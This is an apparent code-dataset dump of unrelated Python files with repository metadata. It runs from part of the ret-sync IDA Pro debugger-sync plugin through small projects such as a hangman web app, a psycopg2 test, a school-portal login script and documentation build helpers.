self.cmd_notice('go', descr='go')\n\n # send a go command (Ctrl-Alt-F5) to the debugger (via the broker and dispatcher)\n def run_notice(self):\n self.cmd_notice('run', descr='run')\n\n # send a single trace command (F11) to the debugger (via the broker and dispatcher)\n def si_notice(self):\n self.cmd_notice('si', descr='trace')\n\n # send a single step command (F10) to the debugger (via the broker and dispatcher)\n def so_notice(self):\n self.cmd_notice('so', descr='step')\n\n # send a notice message to the broker process\n def notice_broker(self, type, args=None):\n if not self.broker_sock:\n return\n\n if args:\n notice = \"[notice]{\\\"type\\\":\\\"%s\\\",%s}\\n\" % (type, args)\n else:\n notice = \"[notice]{\\\"type\\\":\\\"%s\\\"}\\n\" % (type)\n\n try:\n self.broker_sock.sendall(rs_encode(notice))\n except socket.error:\n None\n\n def stop(self):\n if self.broker_sock:\n self.broker_sock.close()\n self.broker_sock = None\n\n self.cb_restore_last_line()\n idaapi.refresh_idaview_anyway()\n self.is_active = False\n rs_log(\"idb is disabled\")\n\n def __init__(self, parser):\n self.color = False\n self.prev_loc = None\n self.prev_node = None\n self.name = idaapi.get_root_filename()\n self.base = idaapi.get_imagebase()\n rs_log(\"module base 0x%x\" % self.base)\n self.base_remote = None\n self.gm = GraphManager()\n self.hexsync = Syncrays()\n self.parser = parser\n self.broker_sock = None\n self.is_active = False\n self.dbg_dialect = None\n self.req_handlers = {\n 'broker': self.req_broker,\n 'loc': self.req_loc,\n 'cmd': self.req_cmd,\n 'cmt': self.req_cmt,\n 'rcmt': self.req_rcmt,\n 'fcmt': self.req_fcmt,\n 'raddr': self.req_raddr,\n 'rbase': self.req_rbase,\n 'cursor': self.req_cursor,\n 'patch': self.req_patch,\n 'rln': self.req_rln,\n 'rrln': self.req_rrln,\n 'lbl': self.req_lbl,\n 'bc': self.req_bc,\n 'bps_get': self.req_bps_get,\n 'bps_set': self.req_bps_set,\n 'modcheck': self.req_modcheck,\n 'dialect': self.req_set_dbg_dialect\n }\n self.prev_req = \"\" # used as a cache if json is not completely received\n\n\n# --------------------------------------------------------------------------\n\n\nclass Broker(QtCore.QProcess):\n\n QP_STATES = ('Not running', 'Starting', 'Running')\n QP_ERRORS = ('Failed to start', 'Crashed', 'Timedout',\n 'Read error', 'Write Error', 'Unknown Error')\n\n def cb_on_error(self, error):\n rs_log(\"[-] broker error: %s\" % Broker.QP_ERRORS[error])\n\n def cb_broker_on_state_change(self, new_state):\n rs_debug(\"broker new state: %s\" % Broker.QP_STATES[new_state])\n if Broker.QP_STATES[new_state] == 'Not running':\n if rsconfig.LOG_TO_FILE_ENABLE:\n rs_log(' check tmp file retsync..err if you think this is an error')\n\n def cb_broker_on_out(self):\n # readAllStandardOutput() returns QByteArray\n data = rs_decode(self.readAllStandardOutput().data())\n batch = data.split('\\n')\n for req in batch:\n self.worker.parse_exec(req.strip())\n\n def __init__(self, parser):\n QtCore.QProcess.__init__(self)\n\n self.error.connect(self.cb_on_error)\n self.readyReadStandardOutput.connect(self.cb_broker_on_out)\n self.stateChanged.connect(self.cb_broker_on_state_change)\n\n # create a request handler\n self.worker = RequestHandler(parser)\n\n# --------------------------------------------------------------------------\n\n\nclass DbgDirHlpr(object):\n\n @staticmethod\n def read_rsds_guid():\n guid = None\n penode = idaapi.netnode()\n penode.create(idautils.peutils_t.PE_NODE)\n rsds = penode.getblob(0, \"s\")\n\n if rsds and rsds.startswith(b'RSDS'):\n guid = (\"%s\" % uuid.UUID(bytes_le=rsds[4:20])).upper()\n\n return guid\n\n @staticmethod\n def read_rsds_pdb():\n penode = idaapi.netnode()\n PE_SUPSTR_PDBNM = idautils.peutils_t.PE_ALT_DBG_FPOS - 8\n penode.create(idautils.peutils_t.PE_NODE)\n pdbname = penode.supstr(PE_SUPSTR_PDBNM, 'S')\n return pdbname\n\n @staticmethod\n def parse_itoldyouso_output(res):\n for line in res.splitlines(True):\n line = line.strip()\n if line.startswith('pdb sig: '):\n return (line.split(':')[-1]).strip()\n return None\n\n\n# --------------------------------------------------------------------------\n\n\nclass GraphManager():\n\n def __init__(self):\n self.prev_node = None\n self.graph_viewer = ida_kernwin.get_current_viewer()\n\n def center(self):\n curnode = ida_graph.viewer_get_curnode(self.graph_viewer)\n\n if not (self.prev_node == curnode):\n ida_graph.viewer_center_on(self.graph_viewer, curnode)\n self.prev_node = curnode\n\n return curnode\n\n\n# --------------------------------------------------------------------------\n\n\nclass CheckBoxActionHandler(idaapi.action_handler_t):\n def __init__(self, cb):\n idaapi.action_handler_t.__init__(self)\n self.cb = cb\n\n def activate(self, ctx):\n self.cb.toggle()\n return 1\n\n def update(self, ctx):\n return idaapi.AST_ENABLE_ALWAYS\n\n\n# --------------------------------------------------------------------------\n\n\nclass CmdHook(ida_kernwin.UI_Hooks):\n\n def __init__(self):\n idaapi.UI_Hooks.__init__(self)\n self.hooked = {}\n self.bugfixed = False\n\n # 74sp1 BUGFIX: IDAPython: ida_kernwin.UI_Hooks.preprocess_action()\n # wouldn't allow inhibiting the action\n pattern = re.compile('preprocess_action\\(self, name\\) -> int')\n if pattern.search(ida_kernwin.UI_Hooks.preprocess_action.__doc__):\n self.bugfixed = True\n\n def minver74sp1(self):\n # idaapi.IDA_SDK_VERSION >= 740:\n return self.bugfixed\n\n def add_hook(self, action_name, callback):\n self.hooked[action_name] = callback\n\n def del_hook(self, action_name):\n del self.hooked[action_name]\n\n def preprocess_action(self, action_name):\n if action_name not in self.hooked:\n return 0\n\n self.hooked[action_name]()\n return 1\n\n\n# --------------------------------------------------------------------------\n\n\nclass SyncForm_t(PluginForm):\n\n hotkeys_ctx = []\n cmd_hooks = CmdHook()\n\n def cb_broker_started(self):\n rs_log(\"broker started\")\n self.btn.setText(\"Restart\")\n\n def cb_broker_finished(self):\n rs_log(\"broker finished\")\n self.uninit_hotkeys()\n if self.broker:\n self.broker.worker.stop()\n self.cb_sync.stateChanged.disconnect(self.cb_change_state)\n self.cb_sync.toggle()\n self.cb_sync.stateChanged.connect(self.cb_change_state)\n\n self.btn.setText(\"Start\")\n\n # send a kill notice to the broker\n # wait at most 2sec for him to gently kill itself\n def smooth_kill(self):\n self.uninit_hotkeys()\n if self.broker:\n broker = self.broker\n self.broker = None\n broker.worker.cb_restore_last_line()\n broker.worker.kill_notice()\n broker.waitForFinished(1500)\n\n def init_broker(self):\n rs_debug(\"init_broker\")\n modname = self.input.text()\n if modname == \"\":\n modname = self.handle_name_aliasing()\n self.input.setText(modname)\n\n cmdline = \"\\\"%s\\\" -u \\\"%s\\\" --idb \\\"%s\\\"\" % (\n PYTHON_PATH,\n BROKER_PATH,\n modname)\n rs_log(\"cmdline: %s\" % cmdline)\n\n try:\n self.broker = Broker(self.parser)\n self.broker.started.connect(self.cb_broker_started)\n self.broker.finished.connect(self.cb_broker_finished)\n self.broker.start(cmdline)\n except Exception as e:\n rs_log(\"[-] failed to start broker: %s\\n%s\" % (str(e), traceback.format_exc()))\n return\n\n self.broker.worker.name = modname\n\n def init_hotkeys(self):\n hotkeys_info = (\n ('F2', self.broker.worker.bp_notice, 'BreakpointToggle'),\n ('F3', self.broker.worker.bp_oneshot_notice),\n ('F10', self.broker.worker.so_notice),\n ('F11', self.broker.worker.si_notice, 'FullScreen'),\n ('Ctrl-F1', self.broker.worker.export_bp_notice, 'ExternalHelp'),\n ('Ctrl-F2', self.broker.worker.hbp_notice),\n ('Ctrl-F3', self.broker.worker.hbp_oneshot_notice),\n ('Alt-F2', self.broker.worker.translate_notice, 'ManualInstruction'),\n ('Alt-F5', self.broker.worker.go_notice),\n ('Ctrl-Alt-F5', self.broker.worker.run_notice),\n )\n\n if not self.hotkeys_ctx:\n for hk_info in hotkeys_info:\n self.init_single_hotkey(*hk_info)\n\n # enable ida_kernwin.UI_Hooks\n if self.cmd_hooks.minver74sp1():\n self.cmd_hooks.hook()\n\n def init_single_hotkey(self, key, fnCb, conflict=None):\n if conflict:\n if self.cmd_hooks.minver74sp1():\n # 'hook' existing action shortcut when possible\n self.cmd_hooks.add_hook(conflict, fnCb)\n return\n else:\n # 'mute' existing action shortcut\n ida_kernwin.update_action_shortcut(conflict, None)\n\n ctx = idaapi.add_hotkey(key, fnCb)\n if ctx is None:\n rs_log(\"failed to register hotkey %s\" % key)\n del ctx\n else:\n self.hotkeys_ctx.append((ctx, key, conflict))\n\n def uninit_hotkeys(self):\n # disable ida_kernwin.UI_Hooks\n if self.cmd_hooks.minver74sp1():\n self.cmd_hooks.unhook()\n\n if not self.hotkeys_ctx:\n return\n\n # delete registered context and restore original action\n for ctx, key, conflict in self.hotkeys_ctx:\n if idaapi.del_hotkey(ctx):\n del ctx\n else:\n rs_log(\"failed to delete hotkey %s\" % key)\n\n if conflict and not self.cmd_hooks.minver74sp1():\n ida_kernwin.update_action_shortcut(conflict, key)\n\n self.hotkeys_ctx = []\n\n def cb_btn_restart(self):\n rs_log('restarting broker')\n if self.cb_sync.checkState() == QtCore.Qt.Checked:\n self.cb_sync.toggle()\n time.sleep(0.1)\n self.cb_sync.toggle()\n\n def cb_change_state(self, state):\n if state == QtCore.Qt.Checked:\n rs_log(\"sync enabled\")\n # Restart broker\n self.hotkeys_ctx = []\n self.init_broker()\n else:\n if self.broker:\n self.smooth_kill()\n rs_log(\"sync disabled\\n\")\n\n def cb_hexrays_sync_state(self, state):\n if self.broker:\n if state == QtCore.Qt.Checked:\n rs_log(\"hexrays sync enabled\\n\")\n self.broker.worker.hexsync.enable()\n else:\n rs_log(\"hexrays sync disabled\\n\")\n self.broker.worker.hexsync.disable()\n\n def cb_hexrays_toggle(self):\n self.cb_hexrays.toggle()\n\n # issue a warning if pdb name is different from\n # the name used to register the idb to the dispatcher\n def pdb_name_warning(self, name):\n pdbpath = DbgDirHlpr.read_rsds_pdb()\n if not pdbpath:\n return\n\n normpath = os.path.normpath(pdbpath.replace(\"\\\\\", \"\\\\\\\\\"))\n pdb_root, pdb_ext = os.path.splitext(os.path.basename(normpath))\n mod_root, mod_ext = os.path.splitext(name)\n\n if pdb_root.strip() != mod_root.strip():\n rs_log(\"hint: pdb name ('%s') differs from registered module name ('%s')\" % (pdb_root+mod_ext, name))\n\n # discover the name used to expose the idb, default is from get_root_filename\n # alias can be defined in '.sync' configuration file\n def handle_name_aliasing(self):\n name = idaapi.get_root_filename()\n rs_log(\"default idb name: %s\" % name)\n\n try:\n conf = load_configuration(name)\n if conf.path:\n rs_log(\"found config file: %s\" % repr(conf))\n if conf.alias:\n name = conf.alias\n rs_log(\"overwrite idb name with %s\" % name)\n except Exception as e:\n rs_log('failed to load configuration file')\n\n self.pdb_name_warning(name)\n return name\n\n def OnCreate(self, form):\n rs_debug(\"form create\")\n\n # get parent widget\n parent = self.FormToPyQtWidget(form)\n\n # create global sync checkbox\n self.cb_sync = QtWidgets.QCheckBox('Synchronization enable')\n self.cb_sync.move(20, 20)\n self.cb_sync.stateChanged.connect(self.cb_change_state)\n\n # create hexrays sync checkbox\n self.cb_hexrays = QtWidgets.QCheckBox('Hex-Rays Synchronization enable')\n self.cb_hexrays.move(20, 20)\n self.cb_hexrays.stateChanged.connect(self.cb_hexrays_sync_state)\n\n # create label\n label = QtWidgets.QLabel('Overwrite idb name:')\n name = self.handle_name_aliasing()\n\n # create input field\n self.input = QtWidgets.QLineEdit(parent)\n self.input.setText(name)\n self.input.setMaxLength = 256\n self.input.setFixedWidth(300)\n\n # create restart button\n self.btn = QtWidgets.QPushButton('restart', parent)\n self.btn.setToolTip('Restart broker.')\n self.btn.clicked.connect(self.cb_btn_restart)\n\n # create layout\n layout = QtWidgets.QGridLayout()\n layout.addWidget(self.cb_sync)\n layout.addWidget(self.cb_hexrays)\n layout.addWidget(label)\n layout.addWidget(self.input)\n layout.addWidget(self.btn, 2, 2)\n layout.setColumnStretch(4, 1)\n layout.setRowStretch(4, 1)\n parent.setLayout(layout)\n\n self.parser = argparse.ArgumentParser()\n self.parser.add_argument('-a', '--address', nargs=1, action='store')\n self.parser.add_argument('msg', nargs=argparse.REMAINDER)\n\n # synchronization is enabled by default\n self.cb_sync.toggle()\n\n # register action for hexrays sync\n action_hex_sync_desc = idaapi.action_desc_t(\n 'hexrays_sync_toogle:action',\n 'Toggle Hex-Rays syncing',\n CheckBoxActionHandler(self.cb_hexrays),\n 'Ctrl+H',\n 'Toggle Hex-Rays syncing',\n 198)\n\n idaapi.register_action(action_hex_sync_desc)\n idaapi.attach_action_to_toolbar(\n \"DebugToolBar\",\n 'hexrays_sync_toogle:action')\n\n # register action for global sync\n action_g_sync_desc = idaapi.action_desc_t(\n 'g_sync_toogle:action',\n 'Toggle syncing',\n CheckBoxActionHandler(self.cb_sync),\n 'Ctrl+Shift+S',\n 'Toggle syncing',\n 203)\n\n idaapi.register_action(action_g_sync_desc)\n idaapi.attach_action_to_toolbar(\n \"DebugToolBar\",\n 'g_sync_toogle:action')\n\n def OnClose(self, form):\n rs_debug(\"form close\")\n self.smooth_kill()\n\n idaapi.unregister_action('hexrays_sync_toogle:action')\n idaapi.detach_action_from_toolbar(\n \"DebugToolBar\",\n 'hexrays_sync_toogle:action')\n\n idaapi.unregister_action('g_sync_toogle:action')\n idaapi.detach_action_from_toolbar(\n \"DebugToolBar\",\n 'g_sync_toogle:action')\n\n global SyncForm\n del SyncForm\n SyncForm = None\n\n def Show(self):\n return PluginForm.Show(self, \"ret-sync\", options=PluginForm.WOPN_PERSIST)\n\n\n# --------------------------------------------------------------------------\n\n\nclass RetSyncPlugin(idaapi.plugin_t):\n flags = idaapi.PLUGIN_PROC\n comment = 'Reverse-Engineering Tools synchronization, ret-sync .'\n help = 'Synchronize a debugging session with IDA.'\n wanted_name = 'ret-sync'\n wanted_hotkey = 'Alt-Shift-S'\n global SyncForm\n SyncForm = None\n\n def init(self):\n return idaapi.PLUGIN_KEEP\n\n def term(self):\n pass\n\n def run(self, arg):\n if not idaapi.get_root_filename():\n rs_log('please load a file/idb before')\n return\n\n global SyncForm\n if not SyncForm:\n SyncForm = SyncForm_t()\n SyncForm.Show()\n rs_log(\"plugin loaded\")\n\n\ndef PLUGIN_ENTRY():\n return RetSyncPlugin()\n\n\nif __name__ == \"__main__\":\n rs_log(\"ret-sync is an IDA Pro plugin, please see README for installation notes\")\n","repo_name":"bootleg/ret-sync","sub_path":"ext_ida/SyncPlugin.py","file_name":"SyncPlugin.py","file_ext":"py","file_size_in_byte":40801,"program_lang":"python","lang":"en","doc_type":"code","stars":1779,"dataset":"github-code","pt":"31"} +{"seq_id":"20729955738","text":"def make_sudoku(size=1):\r\n res=[]\r\n c=0\r\n q=0\r\n n=range(1,size*size+1,1)\r\n while len(res)<(size*size):\r\n if len(res)%size==0:\r\n c=0\r\n q=q+1\r\n line= n[(size*c)+q:]+n[:(size*c)+q]\r\n res.append(line)\r\n c=c+1\r\n return res\r\n","repo_name":"bada02/Prometheus","sub_path":"Prometheus/83.py","file_name":"83.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42598840592","text":"import psycopg2\r\n\r\nconnection = psycopg2.connect('dbname=postgres user=postgres password=1234')\r\n\r\ncursor = connection.cursor()\r\n\r\ncursor.execute('DROP TABLE IF EXISTS table2;')\r\ncursor.execute('''\r\nCREATE TABLE table2 (\r\nid INTEGER PRIMARY KEY,\r\ncompleted BOOLEAN NOT NULL DEFAULT False\r\n);\r\n''')\r\n#list comprehensive\r\ncursor.execute('INSERT INTO table2 (id, completed) values(%s, %s);', (1, True))\r\n#dictionanry\r\nSQL = 'INSERT INTO table2 (id, completed) values(%(id)s, %(completed)s);'\r\ndata = {'id':2, 'completed': False}\r\ncursor.execute(SQL, data)\r\n\r\n#print out the query result\r\ncursor.execute('SELECT * from table2;')\r\nresult = cursor.fetchall()\r\nprint(result)\r\n#after fetch all, if you want to fetch one, there will be nothing left to be fetched\r\n\r\nconnection.commit()\r\n\r\ncursor.close()\r\nconnection.close()","repo_name":"warriorcoding/database-model","sub_path":"testdb.py","file_name":"testdb.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2536630412","text":"import bottle, model, random\n\n# Potrebno le, če je v urejevalniku odprt višji path.\n#import os\n#os.chdir('UvP/Vislice')\n\nLOGO = r'''\n____ ____.__ .__ .__ \n\\ \\ / /|__| _____| | |__| ____ ____ \n \\ Y / | |/ ___/ | | |/ ___\\/ __ \\ \n \\ / | |\\___ \\| |_| \\ \\__\\ ___/ \n \\___/ |__/______>____/__|\\_____>_____>\n \n'''\nID_IGRE_COOKIE_NAME = 'id_igre'\nCOOKIE_SECRET = 'my very special - secret key and passphrase'\nDATOTEKA_S_STANJEM = 'stanje.json'\nDATOTEKA_Z_BESEDAMI = 'besede.txt'\n\n# Naredimo nov objekt vislic in naložimo stanje iz datoteke\nvislice = model.Vislice(DATOTEKA_S_STANJEM, DATOTEKA_Z_BESEDAMI)\nvislice.nalozi_igre_iz_datoteke()\n\n\n@bottle.get('/')\ndef index():\n return bottle.template('index.tpl')\n\n\n@bottle.post('/nova_igra/')\ndef nova_igra():\n id_nove_igre = vislice.nova_igra()\n bottle.response.set_cookie(\n ID_IGRE_COOKIE_NAME, str(id_nove_igre),\n path='/',\n secret=COOKIE_SECRET\n )\n\n bottle.redirect('/igra/')\n\n\n@bottle.get('/igra/')\ndef pokazi_igro():\n id_igre = bottle.request.get_cookie(\n ID_IGRE_COOKIE_NAME,\n secret=COOKIE_SECRET\n )\n igra, poskus = vislice.igre[id_igre]\n\n return bottle.template('igra.tpl',\n igra=igra, poskus=poskus, id_igre=id_igre)\n\n\n@bottle.post('/igra/')\ndef ugibaj():\n id_igre = bottle.request.get_cookie(\n ID_IGRE_COOKIE_NAME,\n secret=COOKIE_SECRET\n )\n\n crka = bottle.request.forms.getunicode('crka')\n \n if len(crka) != 1 or not crka.isalpha():\n bottle.redirect('/igra/')\n else:\n vislice.ugibaj(id_igre, crka)\n bottle.redirect('/igra/')\n\n\n# Statistika\n@bottle.get('/statistika/')\ndef pokazi_statistiko():\n slovar_statistik = model.statistika(DATOTEKA_S_STANJEM)\n return bottle.template('statistika.tpl', slovar_statistik=slovar_statistik)\n\n\n# Slika\n@bottle.get('/img/')\ndef serve_pictures(slika):\n return bottle.static_file(slika, root='img')\n\n\n\nbottle.run(debug=True, reloader=True)\n","repo_name":"matejbolta/vislice","sub_path":"vislice.py","file_name":"vislice.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23177067658","text":"'''\r\nCreated on Jun 26, 2015 Fri - 22:58:49\r\n\r\n@author: LKumaresan\r\n'''\r\n\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom user_interface.win_main import Ui_MainWindow\r\nimport sys\r\nimport os\r\n#from kmxPyQt.qne import qnodeseditor\r\nfrom kmxPyQt.qne.qnodeseditor import QNodesEditor\r\n\r\nclass WinMain(QtWidgets.QMainWindow, Ui_MainWindow):\r\n '''\r\n classdocs\r\n '''\r\n\r\n def __init__(self, parent):\r\n '''\r\n Constructor\r\n '''\r\n QtWidgets.QMainWindow.__init__(self)\r\n self.setupUi(self)\r\n self.parent = parent\r\n self.connectSignalSlots()\r\n self.createScene()\r\n\r\n def connectSignalSlots(self):\r\n #self.btnPropApply.clicked.connect(self.parent.btnClickHere)\r\n pass\r\n \r\n def createScene(self):\r\n self.scene = QtWidgets.QGraphicsScene(self)\r\n bgcolor = QtWidgets.QApplication.palette().color(QtGui.QPalette.Window)\r\n self.scene.setBackgroundBrush(QtGui.QBrush(bgcolor, QtCore.Qt.SolidPattern))\r\n self.graphicsView.setScene(self.scene)\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QtWidgets.QApplication(sys.argv)\r\n m = WinMain(app)\r\n m.show()\r\n sys.exit(app.exec_())\r\n \r\n","repo_name":"kaymatrix/our-py-lib","sub_path":"pepper/src/interface_runner/win_main.py","file_name":"win_main.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"38925801780","text":"import urllib\nimport requests\nfrom bs4 import BeautifulSoup as Soup\nimport urls\nimport functions\n\ndef authenticate (config):\n url = urls.login_url.replace(\"{{SCHOOL_ID}}\", config.school_id).replace(\"{{BRANCH_ID}}\", config.branch_id)\n\n # Retrieve the base information, to retrieve ViewState\n base = requests.get(url)\n soup = Soup(base.text)\n\n headers = {\n \"User-Agent\" : \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2\",\n \"Content-Type\" : \"application/x-www-form-urlencoded\",\n \"Referer\" : url,\n \"Host\" : \"www.lectio.dk\",\n \"Origin\" : \"https://www.lectio.dk\",\n \"Accept\" : \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\"\n }\n\n # Insert validation information\n eventValidationTest = soup.find(id=\"aspnetForm\").find(id=\"__EVENTVALIDATION\")[\"value\"]\n\n eventValidation = urllib.urlencode({\"__EVENTVALIDATION\" : eventValidationTest})\n\n #viewS = \"8AAAAGlpZQotMjMxNTQyMTExaWwEawBnAWsBZwFsAmhpZGwCZwJpbAJrAmUDb2ZmbAJnA2lkbAJnAWlkbAJnBWlkbAJnBWlkbARoaWRsAmcDaWRsBmcBaWwCawNlNUhUWCBTdWtrZXJ0b3BwZW4gLSBLJiMyNDg7YmVuaGF2bnMgVGVrbmlza2UgR3ltbmFzaXVtZGcFaWRsAmcBaWRsAmhpbAJrBGUCNTBkZwdpZGwCZwFpZGwCaGlqaWwCawVwZGRkZGcBaWRsAmcDaWlsAmsGZzJkZHIBZRFtJENvbnRlbnQkTG9naW5NVmlpZGhkBwAAAAlMb2dpblZpZXcTVmFsaWRhdGVSZXF1ZXN0TW9kZQxhdXRvY29tcGxldGUJaW5uZXJodG1sCW1heGxlbmd0aAdDaGVja2VkCU1heExlbmd0aAAj19IUcjRcRxl5n5r%2BQAW3cK1O1g%3D%3D\"\n\n viewS = urllib.urlencode({\"__VIEWSTATEX\" : soup.find(id=\"__VIEWSTATEX\")[\"value\"]})\n\n #viewS = soup.find(id=\"__VIEWSTATEX\")[\"value\"]\n\n eventV = eventValidation\n\n #response = requests.post(url, data=\"m%24Content%24username2=\"+config.username.strip()+\"&m%24Content%24password2=\"+config.password.strip()+\"&time=0&__EVENTARGUMENT=&__VIEWSTATE=&\"+eventValidation+\"&__EVENTTARGET=m%24Content%24submitbtn2&__VIEWSTATEX=\"+soup.find(id=\"__VIEWSTATEX\")[\"value\"],headers=headers, allow_redirects=True)\n response = requests.post(url, data=\"m%24Content%24username2=\"+config.username.strip()+\"&m%24Content%24password2=\"+config.password.strip()+\"&time=0&__EVENTARGUMENT=&__VIEWSTATE=&\"+eventV+\"&__EVENTTARGET=m%24Content%24submitbtn2&\"+viewS,headers=headers, allow_redirects=False)\n\n if \"LastLoginUserName\" in response.cookies:\n return response.cookies\n else:\n return False","repo_name":"IllutionSoft/MyCalendarAPI","sub_path":"LectioAPI/authenticate.py","file_name":"authenticate.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"9995150201","text":"from django.shortcuts import render, redirect\nfrom .models import Episode\nfrom django.core.paginator import Paginator\n\n# Create your views here.\n\ndef index(request):\n if request.method == 'GET':\n search = request.GET.get('search', '')\n episodes = Episode.objects.filter(title__icontains=search).order_by('-published')\n paginator = Paginator(episodes, per_page=10) \n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n context = { \n 'episodes':page_obj, \n }\n return render(request, 'index.html', context)\n\n\n ","repo_name":"jainmonil2101/django-podcast-aggregator","sub_path":"podcast/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30859524740","text":"# DON'T MOVE ME, OTHER REPO'S READTHEDOCS BUILDS DEPEND ON ME STAYING IN THIS DIRECTORY\n#\n# This file was written to build a shared readthedocs sidebar on the sovrin.readthedocs.io website. \n# \n# In each of the sovrin repo's docs folders, there exists a conf.py to be used when building documenation \n# with sphinx. When our docs are build with readthedocs, the conf.py executes. There are a couple of lines \n# in the conf.py that will clone and use this file to generate a shared sidebar that includes all of the repos\n# listed below on the readthedocs website. \n# \n# There is almost certainly a better way to do this, but I have yet to figure that out. Please submit a PR \n# against this repository if you would like to help make this process more elegant.\nimport os\ndef write_if_changed(fname, contents):\n \n try:\n with open(fname, 'r') as fp:\n old_contents = fp.read()\n except:\n old_contents = ''\n \n if old_contents != contents:\n with open(fname, 'w') as fp:\n fp.write(contents)\n\n\n\n\ndef generate_sidebar(conf, conf_api):\n # determine 'latest' or 'stable'\n # if not conf.do_gen:\n do_gen = os.environ.get('SIDEBAR', None) == '1' or conf['on_rtd']\n version = conf['rtd_version']\n \n lines = [\n '', '.. DO NOT MODIFY! THIS PAGE IS AUTOGENERATED!', ''\n ]\n def toctree(name, depth):\n lines.extend(['.. toctree::',\n ' :caption: %s' % name,\n ' :maxdepth: %d' % depth,\n ''])\n\n def endl():\n lines.append('')\n\n def write_local_page(desc, link):\n if conf_api == 'sovrin':\n args = desc, link\n else:\n args = desc, 'https://sovrin-foundation.readthedocs.io/en/%s/%s.html' % (version, link)\n \n lines.append(' %s <%s>' % args)\n\n def write_subproject(project, desc, link):\n if project != conf_api:\n args = desc, project, version, link\n lines.append(' %s ' % args)\n else:\n lines.append(' %s <%s>' % (desc, link))\n \n def write_link(desc, link):\n lines.append(' %s <%s>' % (desc, link))\n\n def write_page_title(title):\n lines.append(title)\n header_bar = '='\n for i in range(0,len(title)):\n header_bar += '=' \n lines.append(header_bar)\n\n\n write_page_title('Sovrin')\n \n # Begin creating sidebar\n toctree('Sovrin', 2)\n write_local_page('Introduction', 'index')\n write_local_page('Build Script', 'build-scripts/ubuntu-1604/README')\n write_local_page('Release Notes', 'release-notes')\n\n toctree('Sovrin Repositories', 2)\n write_subproject('connector-app', 'Connector App', 'index')\n toctree('External Documentation', 1)\n write_link('Hyperledger Indy', 'https://hyperledger-indy.readthedocs.io')\n endl()\n\n write_if_changed('toc.rst', '\\n'.join(lines))\n\ndef get_intersphinx_mapping(version):\n return {\n 'indy': ('http://indy.readthedocs.io/en/%s/' % version, None),\n 'indy-sdk': ('http://indy-sdk.readthedocs.io/en/%s/' % version, None),\n 'indy-node': ('http://indy-node.readthedocs.io/en/%s/' % version, None),\n 'indy-agent': ('http://indy-agent.readthedocs.io/en/%s' % version, None),\n 'indy-plenum': ('http://indy-plenum.readthedocs.io/en/%s' % version, None),\n 'indy-hipe': ('http://hipe.readthedocs.io/en/%s' % version, None),\n }","repo_name":"sovrin-foundation/sov-docs-conf","sub_path":"remote_conf.py","file_name":"remote_conf.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74997282967","text":"# Attention: only are c/c++/py supported!!!\nfrom TestingTools.ctest import CTesting\nfrom TestingTools.pytest import PythonTesting\nfrom Debugger import Crosstab, Tarantula, LineCoverage, Jaccard, Ochiai, RBF\n#import Crosstab, Tarantula, LineCoverage, Jaccard, Ochiai, RBF\n\nclass FaultStorage:\n def __init__(self, srccode):\n self.srccode = srccode\n self.records = []\n self.tempstorage = []\n file = open(srccode)\n self.lines = len(file.readlines())\n file.close()\n if self.srccode.endswith('.py'):\n self.type = 'python'\n self.py = PythonTesting(srccode)\n elif self.srccode.endswith('.c') or self.srccode.endswith('.cpp'):\n self.type = 'c'\n self.c = CTesting(srccode)\n else:\n raise Exception(\"We are not supported for this code debugging. \")\n\n def Test(self, inputcase, outputpath):\n #print(inputcase, \" \" , outputpath)\n if self.type == 'python':\n #print(type(self.py))\n self.tempstorage = self.py.Test(inputcase, outputpath)\n #print(self.tempstorage)\n elif self.type == 'c':\n self.tempstorage = self.c.Test(inputcase, outputpath)\n else:\n print(\"We are not supported for this code debugging. Coming soon. \")\n return\n \n def EndTest(self):\n if self.type == 'python':\n self.py.Delete()\n elif self.type == 'c':\n self.c.Delete()\n\n def ResultRecord(self, result):\n temp = [result]\n temp.extend(self.tempstorage)\n self.records.append(temp)\n self.tempstorage = []\n \n def GenerateTarantula(self):\n return Tarantula.rankBySuspiciousness(LineCoverage.getLineCoverage(self.lines, self.records))\n\n def GenerateCrosstab(self):\n return Crosstab.rankBySuspiciousness(LineCoverage.getLineCoverage(self.lines, self.records))\n\n def GenerateJaccard(self):\n return Jaccard.rankBySuspiciousness(LineCoverage.getLineCoverage(self.lines, self.records))\n\n def GenerateOchiai(self):\n return Ochiai.rankBySuspiciousness(LineCoverage.getLineCoverage(self.lines, self.records))\n\n def GenerateRBF(self):\n CoverageMatrix, CoverageLabel=LineCoverage.getLineCoverageMatrix(self.lines, self.records)\n return RBF.RBF(CoverageMatrix, CoverageLabel)\n","repo_name":"EririSawamura/Debugging-tools-for-cpp-python","sub_path":"Sourcecode/Fault.py","file_name":"Fault.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"9000089690","text":"import os\nimport shutil\nimport wget\nimport glob\nimport common_config\n\nlabels = common_config.model_config[\"labels\"]\n\nif not os.path.exists(common_config.ANNOTATION_PATH):\n os.mkdir(common_config.ANNOTATION_PATH)\n\nwith open(f'{common_config.ANNOTATION_PATH}/label_map.pbtxt', 'w') as f:\n for label in labels:\n f.write('item { \\n')\n 